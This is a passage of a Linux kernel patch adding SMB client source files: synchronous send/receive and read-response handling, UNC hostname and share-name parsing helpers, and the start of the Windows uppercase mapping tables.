++	       struct kvec *resp_iov)
++{
++	return compound_send_recv(xid, ses, server, flags, 1,
++				  rqst, resp_buf_type, resp_iov);
++}
++
++int
++SendReceive2(const unsigned int xid, struct cifs_ses *ses,
++	     struct kvec *iov, int n_vec, int *resp_buf_type /* ret */,
++	     const int flags, struct kvec *resp_iov)
++{
++	struct smb_rqst rqst;
++	struct kvec s_iov[CIFS_MAX_IOV_SIZE], *new_iov;
++	int rc;
++
++	if (n_vec + 1 > CIFS_MAX_IOV_SIZE) {
++		new_iov = kmalloc_array(n_vec + 1, sizeof(struct kvec),
++					GFP_KERNEL);
++		if (!new_iov) {
++			/* otherwise cifs_send_recv below sets resp_buf_type */
++			*resp_buf_type = CIFS_NO_BUFFER;
++			return -ENOMEM;
++		}
++	} else
++		new_iov = s_iov;
++
++	/* 1st iov is a RFC1001 length followed by the rest of the packet */
++	memcpy(new_iov + 1, iov, (sizeof(struct kvec) * n_vec));
++
++	new_iov[0].iov_base = new_iov[1].iov_base;
++	new_iov[0].iov_len = 4;
++	new_iov[1].iov_base += 4;
++	new_iov[1].iov_len -= 4;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = new_iov;
++	rqst.rq_nvec = n_vec + 1;
++
++	rc = cifs_send_recv(xid, ses, ses->server,
++			    &rqst, resp_buf_type, flags, resp_iov);
++	if (n_vec + 1 > CIFS_MAX_IOV_SIZE)
++		kfree(new_iov);
++	return rc;
++}
++
++int
++SendReceive(const unsigned int xid, struct cifs_ses *ses,
++	    struct smb_hdr *in_buf, struct smb_hdr *out_buf,
++	    int *pbytes_returned, const int flags)
++{
++	int rc = 0;
++	struct mid_q_entry *midQ;
++	unsigned int len = be32_to_cpu(in_buf->smb_buf_length);
++	struct kvec iov = { .iov_base = in_buf, .iov_len = len };
++	struct smb_rqst rqst = { .rq_iov = &iov, .rq_nvec = 1 };
++	struct cifs_credits credits = { .value = 1, .instance = 0 };
++	struct TCP_Server_Info *server;
++
++	if (ses == NULL) {
++		cifs_dbg(VFS, "Null smb session\n");
++		return -EIO;
++	}
++	server = ses->server;
++	if (server == NULL) {
++		cifs_dbg(VFS, "Null tcp session\n");
++		return -EIO;
++	}
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsExiting) {
++		spin_unlock(&server->srv_lock);
++		return -ENOENT;
++	}
++	spin_unlock(&server->srv_lock);
++
++	/* Ensure that we do not send more than 50 overlapping requests
++	   to the same server. We may make this configurable later or
++	   use ses->maxReq */
++
++	if (len > CIFSMaxBufSize + MAX_CIFS_HDR_SIZE - 4) {
++		cifs_server_dbg(VFS, "Invalid length, greater than maximum frame, %d\n",
++				len);
++		return -EIO;
++	}
++
++	rc = wait_for_free_request(server, flags, &credits.instance);
++	if (rc)
++		return rc;
++
++	/* make sure that we sign in the same order that we send on this socket
++	   and avoid races inside tcp sendmsg code that could cause corruption
++	   of smb data */
++
++	cifs_server_lock(server);
++
++	rc = allocate_mid(ses, in_buf, &midQ);
++	if (rc) {
++		cifs_server_unlock(server);
++		/* Update # of requests on wire to server */
++		add_credits(server, &credits, 0);
++		return rc;
++	}
++
++	rc = cifs_sign_smb(in_buf, server, &midQ->sequence_number);
++	if (rc) {
++		cifs_server_unlock(server);
++		goto out;
++	}
++
++	midQ->mid_state = MID_REQUEST_SUBMITTED;
++
++	rc = smb_send(server, in_buf, len);
++	cifs_save_when_sent(midQ);
++
++	if (rc < 0)
++		server->sequence_number -= 2;
++
++	cifs_server_unlock(server);
++
++	if (rc < 0)
++		goto out;
++
++	rc = wait_for_response(server, midQ);
++	if (rc != 0) {
++		send_cancel(server, &rqst, midQ);
++		spin_lock(&server->mid_lock);
++		if (midQ->mid_state == MID_REQUEST_SUBMITTED) {
++			/* no longer considered to be "in-flight" */
++			midQ->callback = release_mid;
++			spin_unlock(&server->mid_lock);
++			add_credits(server, &credits, 0);
++			return rc;
++		}
++		spin_unlock(&server->mid_lock);
++	}
++
++	rc = cifs_sync_mid_result(midQ, server);
++	if (rc != 0) {
++		add_credits(server, &credits, 0);
++		return rc;
++	}
++
++	if (!midQ->resp_buf || !out_buf ||
++	    midQ->mid_state != MID_RESPONSE_RECEIVED) {
++		rc = -EIO;
++		cifs_server_dbg(VFS, "Bad MID state?\n");
++		goto out;
++	}
++
++	*pbytes_returned = get_rfc1002_length(midQ->resp_buf);
++	memcpy(out_buf, midQ->resp_buf, *pbytes_returned + 4);
++	rc = cifs_check_receive(midQ, server, 0);
++out:
++	delete_mid(midQ);
++	add_credits(server, &credits, 0);
++
++	return rc;
++}
++
++/* We send a LOCKINGX_CANCEL_LOCK to cause the Windows
++   blocking lock to return. */
++
++static int
++send_lock_cancel(const unsigned int xid, struct cifs_tcon *tcon,
++			struct smb_hdr *in_buf,
++			struct smb_hdr *out_buf)
++{
++	int bytes_returned;
++	struct cifs_ses *ses = tcon->ses;
++	LOCK_REQ *pSMB = (LOCK_REQ *)in_buf;
++
++	/* We just modify the current in_buf to change
++	   the type of lock from LOCKING_ANDX_SHARED_LOCK
++	   or LOCKING_ANDX_EXCLUSIVE_LOCK to
++	   LOCKING_ANDX_CANCEL_LOCK. */
++
++	pSMB->LockType = LOCKING_ANDX_CANCEL_LOCK|LOCKING_ANDX_LARGE_FILES;
++	pSMB->Timeout = 0;
++	pSMB->hdr.Mid = get_next_mid(ses->server);
++
++	return SendReceive(xid, ses, in_buf, out_buf,
++			&bytes_returned, 0);
++}
++
++int
++SendReceiveBlockingLock(const unsigned int xid, struct cifs_tcon *tcon,
++	    struct smb_hdr *in_buf, struct smb_hdr *out_buf,
++	    int *pbytes_returned)
++{
++	int rc = 0;
++	int rstart = 0;
++	struct mid_q_entry *midQ;
++	struct cifs_ses *ses;
++	unsigned int len = be32_to_cpu(in_buf->smb_buf_length);
++	struct kvec iov = { .iov_base = in_buf, .iov_len = len };
++	struct smb_rqst rqst = { .rq_iov = &iov, .rq_nvec = 1 };
++	unsigned int instance;
++	struct TCP_Server_Info *server;
++
++	if (tcon == NULL || tcon->ses == NULL) {
++		cifs_dbg(VFS, "Null smb session\n");
++		return -EIO;
++	}
++	ses = tcon->ses;
++	server = ses->server;
++
++	if (server == NULL) {
++		cifs_dbg(VFS, "Null tcp session\n");
++		return -EIO;
++	}
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsExiting) {
++		spin_unlock(&server->srv_lock);
++		return -ENOENT;
++	}
++	spin_unlock(&server->srv_lock);
++
++	/* Ensure that we do not send more than 50 overlapping requests
++	   to the same server. We may make this configurable later or
++	   use ses->maxReq */
++
++	if (len > CIFSMaxBufSize + MAX_CIFS_HDR_SIZE - 4) {
++		cifs_tcon_dbg(VFS, "Invalid length, greater than maximum frame, %d\n",
++			      len);
++		return -EIO;
++	}
++
++	rc = wait_for_free_request(server, CIFS_BLOCKING_OP, &instance);
++	if (rc)
++		return rc;
++
++	/* make sure that we sign in the same order that we send on this socket
++	   and avoid races inside tcp sendmsg code that could cause corruption
++	   of smb data */
++
++	cifs_server_lock(server);
++
++	rc = allocate_mid(ses, in_buf, &midQ);
++	if (rc) {
++		cifs_server_unlock(server);
++		return rc;
++	}
++
++	rc = cifs_sign_smb(in_buf, server, &midQ->sequence_number);
++	if (rc) {
++		delete_mid(midQ);
++		cifs_server_unlock(server);
++		return rc;
++	}
++
++	midQ->mid_state = MID_REQUEST_SUBMITTED;
++	rc = smb_send(server, in_buf, len);
++	cifs_save_when_sent(midQ);
++
++	if (rc < 0)
++		server->sequence_number -= 2;
++
++	cifs_server_unlock(server);
++
++	if (rc < 0) {
++		delete_mid(midQ);
++		return rc;
++	}
++
++	/* Wait for a reply - allow signals to interrupt. */
++	rc = wait_event_interruptible(server->response_q,
++		(!(midQ->mid_state == MID_REQUEST_SUBMITTED)) ||
++		((server->tcpStatus != CifsGood) &&
++		 (server->tcpStatus != CifsNew)));
++
++	/* Were we interrupted by a signal ? */
++	spin_lock(&server->srv_lock);
++	if ((rc == -ERESTARTSYS) &&
++		(midQ->mid_state == MID_REQUEST_SUBMITTED) &&
++		((server->tcpStatus == CifsGood) ||
++		 (server->tcpStatus == CifsNew))) {
++		spin_unlock(&server->srv_lock);
++
++		if (in_buf->Command == SMB_COM_TRANSACTION2) {
++			/* POSIX lock. We send a NT_CANCEL SMB to cause the
++			   blocking lock to return. */
++			rc = send_cancel(server, &rqst, midQ);
++			if (rc) {
++				delete_mid(midQ);
++				return rc;
++			}
++		} else {
++			/* Windows lock. We send a LOCKINGX_CANCEL_LOCK
++			   to cause the blocking lock to return. */
++
++			rc = send_lock_cancel(xid, tcon, in_buf, out_buf);
++
++			/* If we get -ENOLCK back the lock may have
++			   already been removed. Don't exit in this case. */
++			if (rc && rc != -ENOLCK) {
++				delete_mid(midQ);
++				return rc;
++			}
++		}
++
++		rc = wait_for_response(server, midQ);
++		if (rc) {
++			send_cancel(server, &rqst, midQ);
++			spin_lock(&server->mid_lock);
++			if (midQ->mid_state == MID_REQUEST_SUBMITTED) {
++				/* no longer considered to be "in-flight" */
++				midQ->callback = release_mid;
++				spin_unlock(&server->mid_lock);
++				return rc;
++			}
++			spin_unlock(&server->mid_lock);
++		}
++
++		/* We got the response - restart system call. */
++		rstart = 1;
++		spin_lock(&server->srv_lock);
++	}
++	spin_unlock(&server->srv_lock);
++
++	rc = cifs_sync_mid_result(midQ, server);
++	if (rc != 0)
++		return rc;
++
++	/* rcvd frame is ok */
++	if (out_buf == NULL || midQ->mid_state != MID_RESPONSE_RECEIVED) {
++		rc = -EIO;
++		cifs_tcon_dbg(VFS, "Bad MID state?\n");
++		goto out;
++	}
++
++	*pbytes_returned = get_rfc1002_length(midQ->resp_buf);
++	memcpy(out_buf, midQ->resp_buf, *pbytes_returned + 4);
++	rc = cifs_check_receive(midQ, server, 0);
++out:
++	delete_mid(midQ);
++	if (rstart && rc == -EACCES)
++		return -ERESTARTSYS;
++	return rc;
++}
++
++/*
++ * Discard any remaining data in the current SMB. To do this, we borrow the
++ * current bigbuf.
++ */
++int
++cifs_discard_remaining_data(struct TCP_Server_Info *server)
++{
++	unsigned int rfclen = server->pdu_size;
++	int remaining = rfclen + HEADER_PREAMBLE_SIZE(server) -
++		server->total_read;
++
++	while (remaining > 0) {
++		int length;
++
++		length = cifs_discard_from_socket(server,
++				min_t(size_t, remaining,
++				      CIFSMaxBufSize + MAX_HEADER_SIZE(server)));
++		if (length < 0)
++			return length;
++		server->total_read += length;
++		remaining -= length;
++	}
++
++	return 0;
++}
++
++static int
++__cifs_readv_discard(struct TCP_Server_Info *server, struct mid_q_entry *mid,
++		     bool malformed)
++{
++	int length;
++
++	length = cifs_discard_remaining_data(server);
++	dequeue_mid(mid, malformed);
++	mid->resp_buf = server->smallbuf;
++	server->smallbuf = NULL;
++	return length;
++}
++
++static int
++cifs_readv_discard(struct TCP_Server_Info *server, struct mid_q_entry *mid)
++{
++	struct cifs_readdata *rdata = mid->callback_data;
++
++	return  __cifs_readv_discard(server, mid, rdata->result);
++}
++
++int
++cifs_readv_receive(struct TCP_Server_Info *server, struct mid_q_entry *mid)
++{
++	int length, len;
++	unsigned int data_offset, data_len;
++	struct cifs_readdata *rdata = mid->callback_data;
++	char *buf = server->smallbuf;
++	unsigned int buflen = server->pdu_size + HEADER_PREAMBLE_SIZE(server);
++	bool use_rdma_mr = false;
++
++	cifs_dbg(FYI, "%s: mid=%llu offset=%llu bytes=%u\n",
++		 __func__, mid->mid, rdata->offset, rdata->bytes);
++
++	/*
++	 * read the rest of READ_RSP header (sans Data array), or whatever we
++	 * can if there's not enough data. At this point, we've read down to
++	 * the Mid.
++	 */
++	len = min_t(unsigned int, buflen, server->vals->read_rsp_size) -
++							HEADER_SIZE(server) + 1;
++
++	length = cifs_read_from_socket(server,
++				       buf + HEADER_SIZE(server) - 1, len);
++	if (length < 0)
++		return length;
++	server->total_read += length;
++
++	if (server->ops->is_session_expired &&
++	    server->ops->is_session_expired(buf)) {
++		cifs_reconnect(server, true);
++		return -1;
++	}
++
++	if (server->ops->is_status_pending &&
++	    server->ops->is_status_pending(buf, server)) {
++		cifs_discard_remaining_data(server);
++		return -1;
++	}
++
++	/* set up first two iov for signature check and to get credits */
++	rdata->iov[0].iov_base = buf;
++	rdata->iov[0].iov_len = HEADER_PREAMBLE_SIZE(server);
++	rdata->iov[1].iov_base = buf + HEADER_PREAMBLE_SIZE(server);
++	rdata->iov[1].iov_len =
++		server->total_read - HEADER_PREAMBLE_SIZE(server);
++	cifs_dbg(FYI, "0: iov_base=%p iov_len=%zu\n",
++		 rdata->iov[0].iov_base, rdata->iov[0].iov_len);
++	cifs_dbg(FYI, "1: iov_base=%p iov_len=%zu\n",
++		 rdata->iov[1].iov_base, rdata->iov[1].iov_len);
++
++	/* Was the SMB read successful? */
++	rdata->result = server->ops->map_error(buf, false);
++	if (rdata->result != 0) {
++		cifs_dbg(FYI, "%s: server returned error %d\n",
++			 __func__, rdata->result);
++		/* normal error on read response */
++		return __cifs_readv_discard(server, mid, false);
++	}
++
++	/* Is there enough to get to the rest of the READ_RSP header? */
++	if (server->total_read < server->vals->read_rsp_size) {
++		cifs_dbg(FYI, "%s: server returned short header. got=%u expected=%zu\n",
++			 __func__, server->total_read,
++			 server->vals->read_rsp_size);
++		rdata->result = -EIO;
++		return cifs_readv_discard(server, mid);
++	}
++
++	data_offset = server->ops->read_data_offset(buf) +
++		HEADER_PREAMBLE_SIZE(server);
++	if (data_offset < server->total_read) {
++		/*
++		 * win2k8 sometimes sends an offset of 0 when the read
++		 * is beyond the EOF. Treat it as if the data starts just after
++		 * the header.
++		 */
++		cifs_dbg(FYI, "%s: data offset (%u) inside read response header\n",
++			 __func__, data_offset);
++		data_offset = server->total_read;
++	} else if (data_offset > MAX_CIFS_SMALL_BUFFER_SIZE) {
++		/* data_offset is beyond the end of smallbuf */
++		cifs_dbg(FYI, "%s: data offset (%u) beyond end of smallbuf\n",
++			 __func__, data_offset);
++		rdata->result = -EIO;
++		return cifs_readv_discard(server, mid);
++	}
++
++	cifs_dbg(FYI, "%s: total_read=%u data_offset=%u\n",
++		 __func__, server->total_read, data_offset);
++
++	len = data_offset - server->total_read;
++	if (len > 0) {
++		/* read any junk before data into the rest of smallbuf */
++		length = cifs_read_from_socket(server,
++					       buf + server->total_read, len);
++		if (length < 0)
++			return length;
++		server->total_read += length;
++	}
++
++	/* how much data is in the response? */
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	use_rdma_mr = rdata->mr;
++#endif
++	data_len = server->ops->read_data_length(buf, use_rdma_mr);
++	if (!use_rdma_mr && (data_offset + data_len > buflen)) {
++		/* data_len is corrupt -- discard frame */
++		rdata->result = -EIO;
++		return cifs_readv_discard(server, mid);
++	}
++
++	length = rdata->read_into_pages(server, rdata, data_len);
++	if (length < 0)
++		return length;
++
++	server->total_read += length;
++
++	cifs_dbg(FYI, "total_read=%u buflen=%u remaining=%u\n",
++		 server->total_read, buflen, data_len);
++
++	/* discard anything left over */
++	if (server->total_read < buflen)
++		return cifs_readv_discard(server, mid);
++
++	dequeue_mid(mid, false);
++	mid->resp_buf = server->smallbuf;
++	server->smallbuf = NULL;
++	return length;
++}
+diff --git a/fs/smb/client/unc.c b/fs/smb/client/unc.c
+new file mode 100644
+index 0000000000000..f6fc5e343ea42
+--- /dev/null
++++ b/fs/smb/client/unc.c
+@@ -0,0 +1,69 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2020, Microsoft Corporation.
++ *
++ *   Author(s): Steve French <stfrench@microsoft.com>
++ *              Suresh Jayaraman <sjayaraman@suse.de>
++ *              Jeff Layton <jlayton@kernel.org>
++ */
++
++#include <linux/fs.h>
++#include <linux/slab.h>
++#include <linux/inet.h>
++#include <linux/ctype.h>
++#include "cifsglob.h"
++#include "cifsproto.h"
++
++/* extract the host portion of the UNC string */
++char *extract_hostname(const char *unc)
++{
++	const char *src;
++	char *dst, *delim;
++	unsigned int len;
++
++	/* skip double chars at beginning of string */
++	/* BB: check validity of these bytes? */
++	if (strlen(unc) < 3)
++		return ERR_PTR(-EINVAL);
++	for (src = unc; *src && *src == '\\'; src++)
++		;
++	if (!*src)
++		return ERR_PTR(-EINVAL);
++
++	/* delimiter between hostname and sharename is always '\\' now */
++	delim = strchr(src, '\\');
++	if (!delim)
++		return ERR_PTR(-EINVAL);
++
++	len = delim - src;
++	dst = kmalloc((len + 1), GFP_KERNEL);
++	if (dst == NULL)
++		return ERR_PTR(-ENOMEM);
++
++	memcpy(dst, src, len);
++	dst[len] = '\0';
++
++	return dst;
++}
++
++char *extract_sharename(const char *unc)
++{
++	const char *src;
++	char *delim, *dst;
++
++	/* skip double chars at the beginning */
++	src = unc + 2;
++
++	/* share name is always preceded by '\\' now */
++	delim = strchr(src, '\\');
++	if (!delim)
++		return ERR_PTR(-EINVAL);
++	delim++;
++
++	/* caller has to free the memory */
++	dst = kstrdup(delim, GFP_KERNEL);
++	if (!dst)
++		return ERR_PTR(-ENOMEM);
++
++	return dst;
++}
+diff --git a/fs/smb/client/winucase.c b/fs/smb/client/winucase.c
+new file mode 100644
+index 0000000000000..2f075b5b50df0
+--- /dev/null
++++ b/fs/smb/client/winucase.c
+@@ -0,0 +1,649 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *
++ * Copyright (c) Jeffrey Layton <jlayton@redhat.com>, 2013
++ *
++ * The const tables in this file were converted from the following info
++ * provided by Microsoft:
++ *
++ * 3.1.5.3 Mapping UTF-16 Strings to Upper Case:
++ *
++ * https://msdn.microsoft.com/en-us/library/hh877830.aspx
++ * http://www.microsoft.com/en-us/download/details.aspx?displaylang=en&id=10921
++ *
++ * In particular, the table in "Windows 8 Upper Case Mapping Table.txt" was
++ * post-processed using the winucase_convert.pl script.
++ */
++
++#include <linux/nls.h>
++
++wchar_t cifs_toupper(wchar_t in);  /* quiet sparse */
++
++static const wchar_t t2_00[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0041, 0x0042, 0x0043, 0x0044, 0x0045, 0x0046, 0x0047,
++	0x0048, 0x0049, 0x004a, 0x004b, 0x004c, 0x004d, 0x004e, 0x004f,
++	0x0050, 0x0051, 0x0052, 0x0053, 0x0054, 0x0055, 0x0056, 0x0057,
++	0x0058, 0x0059, 0x005a, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x00c0, 0x00c1, 0x00c2, 0x00c3, 0x00c4, 0x00c5, 0x00c6, 0x00c7,
++	0x00c8, 0x00c9, 0x00ca, 0x00cb, 0x00cc, 0x00cd, 0x00ce, 0x00cf,
++	0x00d0, 0x00d1, 0x00d2, 0x00d3, 0x00d4, 0x00d5, 0x00d6, 0x0000,
++	0x00d8, 0x00d9, 0x00da, 0x00db, 0x00dc, 0x00dd, 0x00de, 0x0178,
++};
++
++static const wchar_t t2_01[256] = {
++	0x0000, 0x0100, 0x0000, 0x0102, 0x0000, 0x0104, 0x0000, 0x0106,
++	0x0000, 0x0108, 0x0000, 0x010a, 0x0000, 0x010c, 0x0000, 0x010e,
++	0x0000, 0x0110, 0x0000, 0x0112, 0x0000, 0x0114, 0x0000, 0x0116,
++	0x0000, 0x0118, 0x0000, 0x011a, 0x0000, 0x011c, 0x0000, 0x011e,
++	0x0000, 0x0120, 0x0000, 0x0122, 0x0000, 0x0124, 0x0000, 0x0126,
++	0x0000, 0x0128, 0x0000, 0x012a, 0x0000, 0x012c, 0x0000, 0x012e,
++	0x0000, 0x0000, 0x0000, 0x0132, 0x0000, 0x0134, 0x0000, 0x0136,
++	0x0000, 0x0000, 0x0139, 0x0000, 0x013b, 0x0000, 0x013d, 0x0000,
++	0x013f, 0x0000, 0x0141, 0x0000, 0x0143, 0x0000, 0x0145, 0x0000,
++	0x0147, 0x0000, 0x0000, 0x014a, 0x0000, 0x014c, 0x0000, 0x014e,
++	0x0000, 0x0150, 0x0000, 0x0152, 0x0000, 0x0154, 0x0000, 0x0156,
++	0x0000, 0x0158, 0x0000, 0x015a, 0x0000, 0x015c, 0x0000, 0x015e,
++	0x0000, 0x0160, 0x0000, 0x0162, 0x0000, 0x0164, 0x0000, 0x0166,
++	0x0000, 0x0168, 0x0000, 0x016a, 0x0000, 0x016c, 0x0000, 0x016e,
++	0x0000, 0x0170, 0x0000, 0x0172, 0x0000, 0x0174, 0x0000, 0x0176,
++	0x0000, 0x0000, 0x0179, 0x0000, 0x017b, 0x0000, 0x017d, 0x0000,
++	0x0243, 0x0000, 0x0000, 0x0182, 0x0000, 0x0184, 0x0000, 0x0000,
++	0x0187, 0x0000, 0x0000, 0x0000, 0x018b, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0191, 0x0000, 0x0000, 0x01f6, 0x0000, 0x0000,
++	0x0000, 0x0198, 0x023d, 0x0000, 0x0000, 0x0000, 0x0220, 0x0000,
++	0x0000, 0x01a0, 0x0000, 0x01a2, 0x0000, 0x01a4, 0x0000, 0x0000,
++	0x01a7, 0x0000, 0x0000, 0x0000, 0x0000, 0x01ac, 0x0000, 0x0000,
++	0x01af, 0x0000, 0x0000, 0x0000, 0x01b3, 0x0000, 0x01b5, 0x0000,
++	0x0000, 0x01b8, 0x0000, 0x0000, 0x0000, 0x01bc, 0x0000, 0x01f7,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x01c4, 0x0000,
++	0x0000, 0x01c7, 0x0000, 0x0000, 0x01ca, 0x0000, 0x01cd, 0x0000,
++	0x01cf, 0x0000, 0x01d1, 0x0000, 0x01d3, 0x0000, 0x01d5, 0x0000,
++	0x01d7, 0x0000, 0x01d9, 0x0000, 0x01db, 0x018e, 0x0000, 0x01de,
++	0x0000, 0x01e0, 0x0000, 0x01e2, 0x0000, 0x01e4, 0x0000, 0x01e6,
++	0x0000, 0x01e8, 0x0000, 0x01ea, 0x0000, 0x01ec, 0x0000, 0x01ee,
++	0x0000, 0x0000, 0x0000, 0x01f1, 0x0000, 0x01f4, 0x0000, 0x0000,
++	0x0000, 0x01f8, 0x0000, 0x01fa, 0x0000, 0x01fc, 0x0000, 0x01fe,
++};
++
++static const wchar_t t2_02[256] = {
++	0x0000, 0x0200, 0x0000, 0x0202, 0x0000, 0x0204, 0x0000, 0x0206,
++	0x0000, 0x0208, 0x0000, 0x020a, 0x0000, 0x020c, 0x0000, 0x020e,
++	0x0000, 0x0210, 0x0000, 0x0212, 0x0000, 0x0214, 0x0000, 0x0216,
++	0x0000, 0x0218, 0x0000, 0x021a, 0x0000, 0x021c, 0x0000, 0x021e,
++	0x0000, 0x0000, 0x0000, 0x0222, 0x0000, 0x0224, 0x0000, 0x0226,
++	0x0000, 0x0228, 0x0000, 0x022a, 0x0000, 0x022c, 0x0000, 0x022e,
++	0x0000, 0x0230, 0x0000, 0x0232, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x023b, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0241, 0x0000, 0x0000, 0x0000, 0x0000, 0x0246,
++	0x0000, 0x0248, 0x0000, 0x024a, 0x0000, 0x024c, 0x0000, 0x024e,
++	0x2c6f, 0x2c6d, 0x0000, 0x0181, 0x0186, 0x0000, 0x0189, 0x018a,
++	0x0000, 0x018f, 0x0000, 0x0190, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0193, 0x0000, 0x0000, 0x0194, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0197, 0x0196, 0x0000, 0x2c62, 0x0000, 0x0000, 0x0000, 0x019c,
++	0x0000, 0x2c6e, 0x019d, 0x0000, 0x0000, 0x019f, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2c64, 0x0000, 0x0000,
++	0x01a6, 0x0000, 0x0000, 0x01a9, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x01ae, 0x0244, 0x01b1, 0x01b2, 0x0245, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x01b7, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_03[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0370, 0x0000, 0x0372, 0x0000, 0x0000, 0x0000, 0x0376,
++	0x0000, 0x0000, 0x0000, 0x03fd, 0x03fe, 0x03ff, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
